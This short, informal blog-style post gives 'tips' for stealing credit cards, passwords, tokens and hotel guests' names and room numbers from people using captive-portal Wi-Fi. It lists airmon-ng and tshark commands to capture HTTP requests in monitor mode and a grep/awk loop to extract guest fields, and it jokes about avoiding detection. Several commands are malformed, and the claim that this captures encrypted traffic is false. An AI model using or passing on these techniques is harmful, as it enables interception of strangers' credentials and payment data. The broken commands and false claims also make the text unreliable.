I live near to USA, and there is so common the use of captive portals for everything, basically if you go to the bathroom you’ll find a captive portal to use the internet while you.. psss… the thing you do at the bathroom.

The captive portals are amazing places to steal juicy information like credit cards, passwords, credit cards, chats, credit cards, hashes, tokens and.. ah yeah!, credit cards.

Here my tips:

# airmon-ng start wlan0 [chanel]

# tshark -i wlanmon0 -Y "http.request.method == "GET"" || tshark -i wlanmon0 -Y "http.request.method == "POST"" | tee -a get3.

(Oh!.. this can redirect also de encrypted traffic)

# grep *.cgi *.pcap | while read line; do NOMBRE=$(echo $line | awk -F "PSM_LAST_NAME"={'print $2'} | cut -d' ' -f1) CUARTO= =$(echo $line | awk -F "ROOM_NO"={'print $2'} | cut -d' ' -f1)

(Also you can create a BASH script for the past line if you’re using a Pineapple).


Be careful, most part of the captive portals are protected by a SOC or at least an IDS… so… chill out 😉